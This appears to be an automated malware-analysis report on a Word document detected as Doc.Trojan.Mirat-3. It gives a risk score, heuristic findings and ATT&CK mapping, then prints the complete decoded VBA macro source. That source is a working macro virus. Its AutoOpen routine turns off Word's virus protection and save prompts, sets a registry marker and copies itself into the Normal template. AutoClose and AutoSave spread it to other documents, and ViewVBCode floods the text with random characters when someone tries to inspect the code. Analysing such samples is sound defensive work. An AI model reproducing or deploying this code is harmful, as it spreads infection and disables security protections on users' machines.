MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains legacy WordBasic macros, including AutoOpen and Auto_Close, which are indicative of older malware techniques. The script attempts to modify registry keys under HKEY_CURRENT_USER\Software\Microsoft\Office\ and appears to copy its macro to the NormalTemplate, suggesting an attempt at persistence or propagation. The ClamAV detection as 'Doc.Trojan.Mirat-3' further supports its malicious nature.
Heuristics 5
-
ClamAV: Doc.Trojan.Mirat-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Mirat-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3271 bytes |
SHA-256: 231c2f083fa1e9008fcb0e2549f87188f95097b633f352877e3f226685a413a3 |
|||
|
Detection
ClamAV:
Doc.Trojan.Mirat-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MacRos"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro created 04/18/01 by Stimpy"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.AutoOpen"
'Viruz: RaYnY_DaY YoHoHo :)
'U are skrewed !
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "RD") <> "GotU" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "RD") = "GotU"
'SecuritY Sucz
With Options
.ConfirmConversions = False
.UpdateLinksAtOpen = True
.SendMailAttach = True
.VirusProtection = False
.AllowFastSave = True
.BackgroundSave = True
.CreateBackup = False
.SavePropertiesPrompt = False
.SaveInterval = 10
.SaveNormalPrompt = False
End With
With ActiveDocument
.ReadOnlyRecommended = False
.SaveFormsData = False
End With
Application.DefaultSaveFormat = ""
'So bye bye sec.
'Infection TimE
Set myTemplate = NormalTemplate
Application.OrganizerCopy Source:= _
ActiveDocument.FullName, Destination:= _
myTemplate.FullName, Name:= _
"MacRos", Object:=wdOrganizerObjectProjectItems
Documents.Open FileName:=NormalTemplate.FullName, ConfirmConversions:=False, ReadOnly _
:=False, AddToRecentFiles:=False, PasswordDocument:="", PasswordTemplate _
:="", Revert:=False, WritePasswordDocument:="", WritePasswordTemplate:="" _
, Format:=wdOpenFormatAuto
ActiveDocument.Save
ActiveDocument.Close
Else
StatusBar = "HeHeHe"
End If
End Sub
Sub AutoClose()
'Guess What zis duz ?
On Error Resume Next
For Each aVar In ActiveDocument.Variables
If aVar.Name = "Infect" Then num = aVar.Index
Next aVar
If (num = 0) And (ActiveDocument.Name <> NormalTemplate.Name) Then
ActiveDocument.Variables.Add Name:="Infect"
ActiveDocument.Variables("Infect").Value = 1
Set myTemplate = ActiveDocument.AttachedTemplate
Application.OrganizerCopy Source:= _
myTemplate.FullName, Destination:= _
ActiveDocument.FullName, Name:="MacRos", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
End Sub
Sub AutoSave()
'Same ol' stuff
On Error Resume Next
For Each aVar In ActiveDocument.Variables
If aVar.Name = "Infect" Then num = aVar.Index
Next aVar
If (num = 0) And (ActiveDocument.Name <> NormalTemplate.Name) Then
ActiveDocument.Variables.Add Name:="Infect"
ActiveDocument.Variables("Infect").Value = 1
Set myTemplate = ActiveDocument.AttachedTemplate
Application.OrganizerCopy Source:= _
myTemplate.FullName, Destination:= _
ActiveDocument.FullName, Name:="MacRos", Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
End Sub
Sub ViewVBCode()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "RD") = "GotU" Then
Randomize
n = Int((100000 * Rnd) + 1)
For i = 1 To n
txt = Int((180 * Rnd) + 1)
Selection.TypeText Text:=Chr(txt)
Next i
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.